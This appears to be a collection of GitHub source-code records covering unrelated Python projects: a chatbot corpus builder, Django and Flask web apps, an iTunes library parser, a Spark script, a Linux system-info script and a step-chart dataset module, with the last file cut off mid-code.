def __call__(self, utterances, responses, min_count):\n words = [word for resp in responses for word in resp]\n words += [word for utte in utterances for u in utte for word in u]\n\n word_count = {w: 0 for w in set(words)}\n for w in words:\n word_count[w] += 1\n\n ignored_word_count = 0\n for word, count in word_count.items():\n if count <= min_count:\n ignored_word_count += 1\n continue\n self.add(word)\n\n return ignored_word_count\n\n def __len__(self):\n return self.idx\n\n def __str__(self):\n return \"%s(size = %d)\".format(self.__class__.__name__, len(self.idx))\n\n\nclass Corpus(object):\n def __init__(self, max_cont_len=10, max_utte_len=50, min_word_count=2):\n self.dict = Dictionary()\n self.max_cont_len = max_cont_len\n self.max_utte_len = max_utte_len\n self.min_word_count = min_word_count\n\n self.parse_data(\"data/dev.txt\", False)\n self.parse_data(\"data/train.txt\", True)\n self.save()\n\n def parse_data(self, inf, is_train):\n utterances, responses, labels = [], [], []\n\n for line in open(inf):\n contexts = line.strip().split(\"\\t\")\n uttes, resp, l = contexts[1:-1], contexts[-1], contexts[0]\n\n resp = resp.split()\n uttes = [utte.split() for utte in uttes]\n\n if len(resp) > self.max_utte_len:\n resp = resp[:self.max_utte_len]\n\n if len(uttes) > self.max_cont_len:\n # close to response\n uttes = uttes[-self.max_cont_len:]\n\n for index, utte in enumerate(uttes):\n if len(utte) > self.max_utte_len:\n uttes[index] = utte[:self.max_utte_len]\n\n utterances.append(uttes)\n responses.append(resp)\n labels.append(int(l))\n\n if is_train:\n ignore_w_nums = self.dict(\n utterances, responses, self.min_word_count)\n self.train_utterances = utterances\n self.train_responses = responses\n self.train_labels = labels\n\n print(\"Ignored counts - [{}]\".format(ignore_w_nums))\n\n else:\n self.test_utterances = utterances\n self.test_responses = responses\n self.test_labels = labels\n\n def save(self):\n data = {\n 'max_cont_len': self.max_cont_len,\n 'max_utte_len': self.max_utte_len,\n 'dict': {\n 'dict': self.dict.word2idx,\n 'dict_size': len(self.dict),\n },\n 'train': {\n 'responses': reps2idx(self.train_responses, self.dict.word2idx),\n 'utterances': uttes2idx(self.train_utterances, self.dict.word2idx),\n 'labels': self.train_labels\n },\n 'test': {\n 'responses': reps2idx(self.test_responses, self.dict.word2idx),\n 'utterances': uttes2idx(self.test_utterances, self.dict.word2idx),\n 'labels': self.test_labels\n }\n }\n\n torch.save(data, \"data/corpus\")\n print('dict length - [{}]'.format(len(self.dict)))\n\n\nif __name__ == \"__main__\":\n Corpus()\n","repo_name":"ne7ermore/torch-light","sub_path":"retrieval-based-chatbots/corpus.py","file_name":"corpus.py","file_ext":"py","file_size_in_byte":3875,"program_lang":"python","lang":"en","doc_type":"code","stars":526,"dataset":"github-code","pt":"52"} +{"seq_id":"43130640923","text":"from votes.models import Project, People, Votes\nfrom django.shortcuts import render, get_object_or_404, get_list_or_404\nfrom django.template import Context, Template, RequestContext, loader\n\nfrom pydoc import help\nfrom scipy.stats.stats import pearsonr\n\ndef index(request):\n\tpeople_all=People.objects.all()\n\tcontext = {'latest_Votes_list': people_all}\n\treturn render(request, 'votes/index.html', context)\n\ndef detail(request, votes_id):\n\tpeople = get_object_or_404(People, pk=votes_id)\n\treturn render(request, 'votes/re.html', {'people': people})\n\ndef details(request, votes_id):\n\tvotess_id=int(str(votes_id))-1\n\tcontext={'vot': Votes.objects.filter(ppid=votess_id), 'ppl':People.objects.all(), 'proj':Project.objects.all(),}\n\treturn render(request, 'votes/details.html', context )\n\ndef result(request, votes_id):\n\tvotess_id=int(str(votes_id))\n\tup={}\n\tud={}\n\tv=[]\n\tu=[]\n\tp=People.objects.all()\n\tfor i in p:\n\t\tif len(Votes.objects.filter(ppid=i.id, vote=-1))!=0:\n\t\t\tv.append((i.id,round(float(len(Votes.objects.filter(ppid=i.id, vote=1)))/float(len(Votes.objects.filter(ppid=i.id, vote=-1))),3)))\n\tu1=sorted(v,key=lambda x: x[1])\n\tpo=0\n\tfor i in u1:\n\t\tif i[0]==votess_id :\n\t\t\tpos=po+1\n\t\tpo=po+1\n\tu2=u1[pos-5:6+pos]\n\tfor i in u2:\n\t\tif i[0]!=votess_id :\n\t\t\tu.append(i[0])\n\tab=[]\n\tfor l in u:\n\t\t#k=People.objects.get(id=i).id\n\t\tfor j in Votes.objects.filter(ppid=int(str(i))):\n\t\t\tif j.pid not in ab:\n\t\t\t\tab.append(j.pid)\n\t\n\tcontext ={'ab': ab, 'p': People.objects.get(id=votess_id),'peop': People.objects.all(), 'l': u}\n\treturn render(request, 'votes/results.html', context)\n","repo_name":"meow333/recommendation-engine","sub_path":"pv1/votes/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1571,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"70237126566","text":"__author__ = 'flipvanrijn'\n\nimport urllib\n\ndef command_pi(bot, reply, args):\n \"\"\"\n Geeft pi terug met een op te geven nauwkeurigheid. Maximale nauwkeurigheid is 500 decimalen.\n .pi \n \"\"\"\n\n arg = args.split(' ')[0]\n\n if not arg:\n bot.msg(reply, 'Een nauwkeurigheid is vereist.')\n else:\n if not arg.isdigit():\n bot.msg(reply, 'I see what you did there!')\n elif int(arg) == 0:\n bot.msg(reply, '4')\n elif int(arg) > 500:\n bot.msg(reply, 'Maximale nauwkeurigheid is 500 decimalen.')\n else:\n fp = urllib.urlopen('http://www.angio.net/pi/digits/10000.txt')\n pi = fp.readline()[0:2+int(arg)]\n bot.msg(reply, pi)\n fp.close()","repo_name":"flipvrijn/kirubot","sub_path":"modules/module_pi.py","file_name":"module_pi.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"30597489592","text":"# -*- coding: utf-8 -*-\n\"\"\"\nTool to get any information about iTunes tracks and playlists quickly and easily.\nMickael \nMIT License\n\"\"\"\n\nimport xml.etree.ElementTree as ET\nfrom urllib.parse import unquote, urlparse\n\n\ndef lib_init():\n \"\"\"Initilize the library, must be called at the very beginning\"\"\"\n lib_class = Library()\n return lib_class\n\n\nclass Library(object):\n def __init__(self):\n \"\"\"Constructor\"\"\"\n self.lib = 0\n self.complete_playlist = []\n self.track_attr_list = []\n \n\n def parse(self, path_to_XML_file):\n \"\"\"Reads xml file and generate tracks list\"\"\"\n tree = ET.parse(path_to_XML_file)\n self.lib = tree.getroot()\n self.read_tracks()\n \n \n def get_playlist_list(self):\n \"\"\"Creates playlists list\"\"\"\n main_dict = self.lib.findall('dict')\n \n sub_array=main_dict[0].findall('array')\n sub_array_childrens = list(sub_array[0])\n \n # For each playlist\n playlist_name_list = []\n for array in sub_array_childrens:\n playlist = list(array)\n \n # Save name of playlists\n for i in range(len(playlist)):\n if playlist[i].text == \"Name\":\n playlist_name_list.append(playlist[i+1].text)\n cur_playlist_name = playlist[i+1].text\n \n \n # Get tracks\n if playlist[i].tag == \"array\":\n sub_array = list(playlist[i])\n \n for k in range(len(sub_array)):\n track_tags = list(sub_array[k])\n \n self.complete_playlist.append([cur_playlist_name, \n track_tags[1].text])\n \n return playlist_name_list\n \n \n def get_track_list(self):\n \"\"\"Returns playlists list\"\"\"\n return self.track_attr_list\n \n def read_tracks(self):\n \"\"\"Generate tracks list\"\"\"\n attribut_name_list = [\"Track ID\", \"Size\", \"Total Time\", \"Date Modified\", \n \"Date Added\", \"Bit Rate\", \"Sample Rate\", \"Play Count\", \n \"Play Date\", \"Play Date UTC\", \"Skip Count\", \"Skip Date\", \n \"Rating\", \"Album Rating\", \"Persistent ID\", \"Track Type\",\n \"File Folder Count\", \"Library Folder Count\", \"Name\", \n \"Artist\", \"Kind\", \"Location\"]\n \n class Track:\n def __init__(self, track_id, size, total_time, date_modified, \n date_added, bitrate, sample_rate, play_count, play_date, \n play_date_utc, skip_count, skip_date, rating,\n album_rating, persistent_id, track_type, \n file_folder_count, library_folder_count, name, artist, \n kind, location):\n \n self.track_id = track_id\n self.size = size\n self.total_time = total_time\n self.date_modified = date_modified\n self.date_added = date_added\n self.bitrate = bitrate\n self.sample_rate = sample_rate\n self.play_count = play_count\n self.play_date = play_date\n self.play_date_utc = play_date_utc\n self.skip_count = skip_count\n self.skip_date = skip_date\n self.rating = rating\n self.album_rating = album_rating\n self.persistent_id = persistent_id\n self.track_type = track_type\n self.file_folder_count = file_folder_count\n self.library_folder_count = library_folder_count\n self.name = name\n self.artist = artist\n self.kind = kind\n self.location = location\n \n \n # Create tracks list with attributes\n main_dict = self.lib.findall('dict') \n \n sub_array=main_dict[0].findall('dict')\n sub_array_childrens = list(sub_array[0])\n \n for track in sub_array_childrens:\n att_list = [None] * 22\n \n if track.tag == \"dict\":\n track_attributes = list(track)\n for att_ind in range(0, len(track_attributes), 2):\n try:\n tag_index = attribut_name_list.index(\n track_attributes[att_ind].text)\n except ValueError:\n pass\n else:\n att_list[tag_index] = track_attributes[att_ind+1].text\n\n self.track_attr_list.append(Track(att_list[0], att_list[1], \n att_list[2], att_list[3],\n att_list[4], att_list[5], \n att_list[6], att_list[7],\n att_list[8], att_list[9], \n att_list[10], att_list[11],\n att_list[12], att_list[13], \n att_list[14], att_list[15], \n att_list[16], att_list[17], \n att_list[18], att_list[19], \n att_list[20], att_list[21]))\n \n \n def get_playlist_contents(self, playlist_name):\n \"\"\"Returns tracks (with attributes) of given playlist\"\"\"\n playlist_with_attributes = []\n \n for track in self.complete_playlist:\n if track[0] == playlist_name:\n temp_track_ID = track[1]\n \n for elem in self.track_attr_list: \n if elem.track_id == temp_track_ID:\n playlist_with_attributes.append(elem)\n break\n return playlist_with_attributes\n \n \ndef get_size(input_size):\n \"\"\"Returns the size of a track in a human-readable way\"\"\"\n return float(\"{0:.2f}\".format(int(input_size)/1E6))\n \n \ndef get_total_time(input_time):\n \"\"\"Returns the duration of a track in a human-readable way\"\"\"\n return int(int(input_time)/1000)\n\n\ndef get_rating(input_rating):\n \"\"\" Returns stars iTunes rating\"\"\"\n if input_rating:\n return (int(input_rating)/100)*5\n else:\n return input_rating\n \n\ndef get_track_path(input_url):\n \"\"\"Returns the path of a track\"\"\"\n return unquote(urlparse(input_url).path[1:])\n","repo_name":"mickael2054/IReadiTunes","sub_path":"IReadiTunes/IReadiTunes.py","file_name":"IReadiTunes.py","file_ext":"py","file_size_in_byte":6722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"21003596604","text":"\r\ndef searchName():\r\n user_input = input(\">>\").title()\r\n \r\n my_file = open(\"names.txt\" , \"r\")\r\n \r\n for s in my_file:\r\n if s.startswith(user_input):\r\n print(s)\r\n\r\ndef searchAge():\r\n inline = open(\"names.txt\", \"r\")\r\n user_input=str(input(\"Enter a number: \"))\r\n \r\n for s in inline:\r\n if user_input in s:\r\n print(s)\r\n\r\n \r\nif __name__=='__main__':\r\n \r\n pick = int(input(\"enter 1 to search for name or enter 2 to search for age: \"))\r\n \r\n if pick == 1 :\r\n searchName()\r\n elif pick == 2:\r\n searchAge()\r\n else:\r\n print(\"Invalid Choice \")\r\n","repo_name":"vicYegon/my-SEPA22-preliminary-projs","sub_path":"Adding the main function.py","file_name":"Adding the main function.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"40140856568","text":"\"\"\"Tests for the CLI.\"\"\"\n\nfrom click.testing import CliRunner\nfrom plab2.cli import compile\nfrom pathlib import Path\n\nTHIS_DIR = Path(__file__).parent\nTHIS_PATH = THIS_DIR.joinpath(\"data\")\nPPI_FILE = THIS_PATH.joinpath('ppis.csv')\nNODES_FILE = THIS_PATH.joinpath('nodes.tsv')\nEDGES_FILE = THIS_PATH.joinpath('edges.tsv')\n\n\nclass TestCli:\n def test_compile(self):\n \"\"\"Tests for subcommand compile\"\"\"\n runner = CliRunner()\n result = runner.invoke(compile, [str(PPI_FILE), str(NODES_FILE), str(EDGES_FILE), \"--enrich\"])\n assert result.exit_code == 0\n assert NODES_FILE.is_file()\n assert EDGES_FILE.is_file()\n NODES_FILE.unlink()\n EDGES_FILE.unlink()\n assert not NODES_FILE.is_file()\n assert not EDGES_FILE.is_file()\n\n help_result = runner.invoke(compile, [\"--help\"])\n assert \"Enrich the graph with RNA and DNA molecules.\" in help_result.output\n\n\n\n\n\n\n\n","repo_name":"danqi123/gene_protein_network_package","sub_path":"plab2_package/tests/test_cli.py","file_name":"test_cli.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72021210406","text":"#!/usr/bin/python3\n\"\"\"Defines a matrix multiplication function using NumPy.\"\"\"\nimport numpy as np\n\n\ndef lazy_matrix_mul(m_a, m_b):\n \"\"\"\n Multiplies two matrices m_a and m_b using NumPy.\n\n Args:\n m_a (list): The first matrix.\n m_b (list): The second matrix.\n\n Returns:\n np.ndarray: The resulting matrix of the multiplication.\n \"\"\"\n # Convert input lists to NumPy arrays\n np_a = np.array(m_a)\n np_b = np.array(m_b)\n\n # Check if the matrices can be multiplied\n if np_a.shape[1] != np_b.shape[0]:\n raise ValueError(\"m_a and m_b can't be multiplied\")\n\n # Perform matrix multiplication using NumPy\n result = np.dot(np_a, np_b)\n\n return result\n","repo_name":"Gideon5348/alx-higher_level_programming","sub_path":"0x07-python-test_driven_development/101-lazy_matrix_mul.py","file_name":"101-lazy_matrix_mul.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"74414045605","text":"import basicoperations\nfrom pyspark.sql import SparkSession\nfrom pyspark.sql.functions import *\n\nif __name__ == \"__main__\":\n #python write.py ..\\Rural_Atlas_Update20\\Income.csv\n spark = (SparkSession\n .builder\n .appName('write')\n .getOrCreate())\n\n income_df = spark.read.csv(basicoperations.INCOME_FILE, \n schema = basicoperations.SCHEMA,\n header = True)\n\n richest_states = (income_df\n .select('State','County','PerCapitaInc')\n .sort(col('PerCapitaInc'), Ascending = False)\n )\n\n #write to parquet file (schema stored with data)\n richest_states.show(5)\n\n op_path = './out/richest_states.parquet'\n \n print(f'Writing richest state data to {op_path}')\n\n richest_states.write \\\n .format('parquet') \\\n .save(op_path)\n\n #read from written file again\n print(f'Reading richest state data from {op_path}')\n richest_parquet_df = spark.read.parquet(op_path)\n print(richest_parquet_df.schema)\n richest_parquet_df.show(20)","repo_name":"krishansubudhi/sparkparactice","sub_path":"write.py","file_name":"write.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"32102784092","text":"with open('st_15_12_22.txt') as f:\n maxx=0\n count=0\n f = f.readline().split('F')\n for x in f:\n if x.count('A')<=2:\n \n maxx=max(maxx,len(x))\nprint(maxx)\n \n","repo_name":"olgaObnosova/EGE_2","sub_path":"№24/st_15_12_22.py","file_name":"st_15_12_22.py","file_ext":"py","file_size_in_byte":198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"23255600050","text":"from flask import Flask, render_template, request, jsonify, abort\nfrom flask_lazyviews import LazyViews\nimport requests\n\n\napp = Flask(__name__)\nviews = LazyViews(app)\n\n@app.route('/')\ndef inicio():\n return render_template('index.html', title=\"Star Wars\")\n\n\n@app.route('/peliculas')\ndef peliculas():\n response = requests.get('https://swapi.dev/api/films')\n lista_peliculas = response.json()['results']\n\n return render_template('peliculas.html', title=\"Peliculas Star Wars\", peliculas=lista_peliculas)\n\n\n@app.route('/personajes')\ndef personajes():\n\n return render_template('personajes.html')\n\n\n@app.route('/traer_personaje')\ndef traer_personajes_pelicula():\n id_personaje = request.args.get('id_personaje')\n\n response_personajes = requests.get(f'https://swapi.dev/api/people/{id_personaje}')\n\n if not response_personajes.ok:\n abort(404, description=\"Personaje no existe, intente con un ID del 1 al 83\")\n\n info_personaje = response_personajes.json()\n\n info_basica_personaje = {'id': id_personaje,\n 'nombre': info_personaje['name'],\n 'altura': info_personaje['height'],\n 'color_cabello': info_personaje['hair_color'],\n 'anio_nacimiento': info_personaje['birth_year']}\n\n\n return jsonify(result=info_basica_personaje)\n\n\n@app.errorhandler(404)\ndef resource_not_found(e):\n return jsonify(error=str(e)), 404\n\n\napp.run(host='0.0.0.0')","repo_name":"javihng/prueba_javier","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"98016904","text":"from collections import deque\n\ndef dfs(graph: dict, source: str, target: str) -> bool:\n if source == target: return True\n \n explored = [source]\n s = deque()\n s.append(source)\n\n while s:\n start = s.pop()\n for v in graph[start]:\n if v == target:\n return True\n if v not in explored:\n s.append(v)\n explored.append(v)\n\n return False\n\n\nadj_list = {'s': ['a', 'b'], 'a': ['s', 'c'], 'b': ['s', 'c', 'd'], 'c': ['a', 'b', 'd', 'e'], 'd': ['b', 'c', 'e'], 'e': ['c', 'd']}\nprint(dfs(adj_list, 's', 'e'))\nprint(dfs(adj_list, 's', 'f'))","repo_name":"unit0113/projects","sub_path":"Algorithms/Algorithms_Illuminated/dfs.py","file_name":"dfs.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"9886243650","text":"# Auth: Stephen Foster CS-446, Feb '22\n\n# stephenfoster_examine_system.py\n\n# Prints the following:\n\n# CPU type and model.\n# Kernel version details. \n# Amount of time since last boot.\n# The time that the system was last booted (same format)- Note: this is not the same as 3, try exploring the systemd process.\n# The number of disk requests made. \n# The number of processes created since last boot.\n\n# To: _systemDetails.txt\n\nimport os\nimport datetime\nfrom sys import platform\n\ndef main():\n\n if platform != \"linux\":\n print(\"Oops! You're running this script from \" + platform.capitalize() + \"!\")\n exit()\n \n netid = \"stephenfoster\"\n self = netid + \"_examine_system.py\"\n out_file = netid + \"_systemDetails.txt\"\n out_path = os.path.split(os.path.join(os.getcwd(), self))[0]\n\n #Take and parse input from /proc\n cpuinfo = parseForStart(getRaw(\"/proc/cpuinfo\"), [\"model name\", \"cpu cores\"])\n version = fixListToStr(getRaw(\"/proc/version\"))\n uptime = float(parsePos(fixListToStr(getRaw(\"/proc/uptime\")), 0, \" \"))\n systemd = int(parsePos(fixListToStr(getRaw(\"/proc/1/stat\")), 21, \" \"))\n boottime = int(parsePos(fixListToStr(parseForStart(getRaw(\"/proc/stat\"), [\"btime\"])), 1, \" \"))\n diskstats = parsePos(fixListToStr(parseForRelSub(getRaw(\"/proc/diskstats\"), [\"sda1\"], -1)), 1, \"sda\")\n vmstats = parseForStart(getRaw(\"/proc/vmstat\"), [\"pgpgin\", \"pgpgout\", \"pswpin\", \"pswpout\"])\n processes = parsePos(fixListToStr(parseForStart(getRaw(\"/proc/stat\"), [\"processes\"])), 1, \" \")\n\n #Format uptime from /proc/uptime\n uptime = str(datetime.timedelta(seconds=int(uptime)))\n\n #Calculate boot date/time from /proc/1/stat starttime(22) [boot time since epoch + time elapsed until systemd = start date]\n HZ = os.sysconf(os.sysconf_names['SC_CLK_TCK'])\n boottime += systemd/HZ\n boottime = str(datetime.datetime.fromtimestamp(int(boottime)))\n \n #Further parse and fill diskstats\n reads = \"Reads: \" + parsePos(diskstats, 1, \" \")\n writes = \"Writes: \" + parsePos(diskstats, 5, \" \") + \"\\n\"\n diskstats = [reads, writes]\n \n #Output polishing\n cpuinfo.insert(0, \"(1) CPU Type and Model:\\n\")\n for x in range(1, len(cpuinfo)):\n cpuinfo[x] = \"\\t\" + cpuinfo[x]\n version = (\"(2) Kernel Version:\\n\\t\") + version\n uptime = \"(3) Uptime: \" + str(uptime)\n boottime = \"(4) System Boot: \" + boottime\n diskstats = [\"(5) Disk Requests:\\n\"] + diskstats\n for x in range(1, len(diskstats)):\n diskstats[x] = \"\\t\" + diskstats[x]\n processes = \"(6) Processes: \" + fixListToStr(processes)\n\n #Fill an output buffer and write it to the out file\n buffer = [cpuinfo, version, uptime, boottime, diskstats, processes]\n clearFile(out_path, out_file)\n\n for item in buffer:\n if type(item) == list:\n for s in item:\n outputToFile(out_path, out_file, str(s))\n elif type(item) == str:\n outputToFile(out_path, out_file, item + \"\\n\")\n else:\n outputToFile(out_path, out_file, str(item))\n\ndef getRaw(_path):\n fin = open(_path, \"r\")\n raw = fin.readlines()\n fin.close()\n return raw\n\ndef parseForRelSub(_lines, _strs, _pos):\n hits = []\n numLines = 0\n for line in _lines:\n for _str in _strs:\n if _str in line:\n hits = hits[:] + [_lines[numLines + _pos]]\n if len(hits) == len(_strs):\n return hits\n numLines += 1\n return hits\n\ndef parseForSub(_lines, _strs):\n hits = []\n for line in _lines:\n for _str in _strs:\n if line.find(_str):\n hits = hits[:] + [line]\n if len(hits) == len(_strs):\n return hits\n return hits\n\ndef parseForStart(_lines, _strs):\n hits = []\n for line in _lines:\n for _str in _strs:\n if line.startswith(_str):\n hits = hits[:] + [line]\n if len(hits) == len(_strs):\n return hits\n return hits\n \ndef parsePos(_line, _pos, _delin):\n positions = _line.split(_delin)\n return positions[_pos]\n\ndef fixListToStr(_list):\n return str(_list).replace('[','').replace(']','').replace('\\'', '').replace('\\\\n', '')\n\ndef outputToFile(_path, _out_file, _str):\n fout = open(_path + \"/\" + _out_file, \"a\")\n fout.write(_str)\n fout.close()\n\ndef clearFile(_path, _out_file):\n fout = open(_path + \"/\" + _out_file, \"w\")\n fout.write('')\n fout.close()\n\nif __name__ == '__main__':\n main()","repo_name":"Stehfyn/cs446","sub_path":"Assignment-1/stephenfoster_examine_system.py","file_name":"stephenfoster_examine_system.py","file_ext":"py","file_size_in_byte":4515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"35332494925","text":"from django.urls import path\n\nfrom .views.author import (AuthorCreate, AuthorDelete, AuthorDetail,\n AuthorList, AuthorUpdate, StaffAuthor,\n StaffAuthorDetail)\n# staff\nfrom .views.book import (BookCreate, BookDelete, BookDetail, BookList,\n BookUpdate)\nfrom .views.category import (CategoryCreate, CategoryDelete, CategoryDetail,\n CategoryList, CategoryUpdate, StaffCategory,\n StaffCategoryDetail)\nfrom .views.home import HomeView\nfrom .views.search import SearchResultsView\n\n# home\nurlpatterns = [\n path('', HomeView.as_view(), name='home')\n]\n\n# search\nurlpatterns += [\n path('search/', SearchResultsView.as_view(), name='search_result')\n]\n\n# book\nurlpatterns += [\n path('book/', BookList.as_view(), name='book_list'),\n path('book/', BookDetail.as_view(), name='book_detail'),\n]\n\n# author\nurlpatterns += [\n path('author/', AuthorList.as_view(), name='author_list'),\n path('author/', AuthorDetail.as_view(), name='author_detail'),\n]\n\n# category\nurlpatterns += [\n path('category/', CategoryList.as_view(), name='category_list'),\n path('category/', CategoryDetail.as_view(), name='category_detail'),\n]\n\n# staff\nurlpatterns += [\n # book\n path('staff/book/create/', BookCreate.as_view(), name='book_create'),\n path('staff/book/edit/', BookUpdate.as_view(), name='book_edit'),\n path('staff/book/delete/', BookDelete.as_view(), name='book_delete'),\n\n # category\n path('staff/category/', StaffCategory.as_view(), name='staff_category'),\n path('staff/category/', StaffCategoryDetail.as_view(), name='staff_category_detail'),\n path('staff/category/create/', CategoryCreate.as_view(), name='category_create'),\n path('staff/category/edit/', CategoryUpdate.as_view(), name='category_edit'),\n path('staff/category/delete/', CategoryDelete.as_view(), name='category_delete'),\n\n # author\n path('staff/author/', StaffAuthor.as_view(), name='staff_author'),\n path('staff/author/', StaffAuthorDetail.as_view(), name='staff_author_detail'),\n path('staff/author/create/', AuthorCreate.as_view(), name='author_create'),\n path('staff/author/edit/', AuthorUpdate.as_view(), name='author_edit'),\n path('staff/author/delete/', AuthorDelete.as_view(), name='author_delete'),\n]\n","repo_name":"MaryamHoushyari/Book-Store","sub_path":"BookStoreSrc/product/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"34855832303","text":"\nimport os\nimport shutil\n\nimport numpy as np\nimport torch\nfrom torch.utils.data import Dataset, DataLoader, ConcatDataset, Sampler\n\nfrom deepSM import SMData\nfrom deepSM import utils\nimport deepSM.beat_time_converter as BTC\nfrom deepSM import wavutils\nfrom deepSM import StepPlacement\nfrom deepSM import SMDataset\nfrom deepSM import SMGenDataset\n\nimport h5py\n\nfrom importlib import reload\nreload(BTC)\nreload(wavutils)\nreload(utils)\nreload(SMData)\nreload(SMDataset)\n\n\ndef get_dataset_from_file(\n dataset_name,\n dataset_type,\n song_names=None,\n n_songs=None,\n base_path=utils.BASE_PATH,\n concat=True,\n step_pos_labels=False,\n **kwargs):\n\n ds_path = f\"{base_path}/datasets/{dataset_name}\"\n dataset_type = dataset_type.lower()\n\n if song_names is None:\n song_names = os.listdir(ds_path)\n\n if n_songs is not None:\n song_names = song_names[:n_songs]\n\n smds = []\n\n # Can include context size here!\n for song_name in song_names:\n if dataset_type in 'generat':\n smds.append(SMGenDataset.load(\n song_name, dataset_name=dataset_name,\n **kwargs))\n elif dataset_type in 'placement':\n smds.append(SMDataset.load(\n song_name, dataset_name=dataset_name,\n **kwargs))\n else:\n raise ValueError(\"Dataset type must be gen or placement.\")\n\n if concat:\n res = ConcatDataset(smds)\n else:\n res = smds\n\n if step_pos_labels:\n labels = []\n for smd in smds:\n labels.append(smd.step_pos_labels[:, 7:-7].reshape(-1))\n\n labels = np.concatenate(labels)\n\n return res, labels\n\n else:\n return res\n\ndef get_dataset_from_raw(\n raw_data_name,\n base_path=utils.BASE_PATH,\n chunk_size=100):\n\n song_names = os.listdir(f\"{base_path}/data/{raw_data_name}\")\n\n smds = []\n for song_name in song_names:\n smds.append(generate(\n song_name, raw_data_name, base_path, chunk_size=chunk_size))\n\n return ConcatDataset(smds)\n\n\ndef train_test_split_dataset(\n dataset_name,\n test_split=0.25,\n base_path=utils.BASE_PATH):\n\n ds_path = f\"{base_path}/datasets/{dataset_name}\"\n\n song_names = os.listdir(ds_path)\n np.random.shuffle(song_names)\n\n n_train = int(np.round(len(song_names) * (1 - test_split)))\n train_songs = song_names[:n_train]\n test_songs = song_names[n_train:]\n\n train_path = f\"{ds_path}_train\"\n test_path = f\"{ds_path}_test\"\n if not os.path.isdir(train_path):\n os.mkdir(train_path)\n if not os.path.isdir(test_path):\n os.mkdir(test_path)\n\n for song in train_songs:\n shutil.copytree(f\"{ds_path}/{song}\", f\"{train_path}/{song}\")\n\n for song in test_songs:\n shutil.copytree(f\"{ds_path}/{song}\", f\"{test_path}/{song}\")\n\n\n\ndef save_generated_datasets(\n raw_data_name,\n dataset_name=None,\n song_names=None,\n base_path=utils.BASE_PATH,\n test_split=0.25,\n overwrite=False,\n **kwargs):\n \"\"\"\n Generates datasets from raw data, and saves them into a dataset.\n Optionally with train-test splits.\n \"\"\"\n\n if dataset_name is None:\n dataset_name = f\"{raw_data_name}_placement\"\n\n raw_data_path = f\"{base_path}/data/{raw_data_name}\"\n ds_path = f\"{base_path}/datasets/{dataset_name}\"\n\n if song_names is None:\n song_names = os.listdir(raw_data_path)\n\n if test_split is not None:\n song_names = song_names.copy()\n np.random.shuffle(song_names)\n\n n_train = int(np.round(len(song_names) * (1-test_split)))\n\n train_set = song_names[:n_train]\n test_set = song_names[n_train:]\n\n save_generated_datasets(\n raw_data_name,\n dataset_name + '_train',\n train_set,\n base_path,\n None, overwrite, **kwargs)\n\n save_generated_datasets(\n raw_data_name,\n dataset_name + '_test',\n test_set,\n base_path,\n None, overwrite, **kwargs)\n\n return dataset_name\n\n if os.path.isdir(ds_path):\n if not overwrite:\n raise ValueError(\"Dataset %s already exists.\" % dataset_name)\n else:\n os.mkdir(ds_path)\n\n for song_name in song_names:\n smd = generate(song_name, raw_data_name, base_path, **kwargs)\n smd.save(dataset_name=dataset_name)\n\n return dataset_name\n\n\ndef augment_dataset(\n dataset_name, model_name, base_path=utils.BASE_PATH, **kwargs):\n \"\"\"\n Adds step predictions to the dataset.\n\n Currently unused, as we train step generation models based on true step\n placement labels.\n \"\"\"\n\n new_dataset_name = f\"{dataset_name}_placement\"\n model_path = f\"{base_path}/models/{model_name}\"\n print(\"New dataset name:\")\n print(new_dataset_name)\n\n placement_model = StepPlacement.RegularizedRecurrentStepPlacementModel()\n placement_model.load_state_dict(torch.load(model_path))\n placement_model.cuda()\n\n smds = get_dataset_from_file(\n dataset_name, chunk_size = -1, concat=False, **kwargs)\n\n for smd in smds:\n\n step_preds = []\n\n for i in range(len(smd.diffs)):\n d = smd[i]\n\n # Adding empty batch dimension.\n def preprocess_data(val):\n if isinstance(val, np.ndarray):\n val = torch.from_numpy(val)\n return torch.unsqueeze(val, 0)\n\n d = dict(map(\n lambda x: (x[0], preprocess_data(x[1])),\n d.items()))\n\n\n step_pos_labels = d['step_pos_labels'].cuda()\n step_type_labels = d['step_type_labels'].cuda().long()\n fft_features = d['fft_features'].cuda()\n diff = d['diff'].cuda().float()\n\n\n with torch.no_grad():\n step_predictions = placement_model(fft_features, diff)\n\n\n step_predictions = np.r_[\n np.ones(smd.context_size) * -25,\n step_predictions.cpu().numpy().reshape(-1),\n np.ones(smd.context_size) * -25\n ].reshape((1, -1))\n\n step_preds.append(step_predictions)\n\n smd.step_predictions = np.concatenate(step_preds)\n\n smd.save(dataset_name=new_dataset_name)\n\n\ndef generate(\n song_name,\n raw_data_name,\n base_path=utils.BASE_PATH,\n chunk_size=100,\n context_size=7,\n drop_diffs=[],\n log=False):\n \"\"\"\n Generate an SMDataset from SM/wav files.\n Only creates datasets with no step predictions.\n \"\"\"\n\n sm = SMData.SMFile(song_name, raw_data_name, base_path)\n\n # May want to save the time mapping 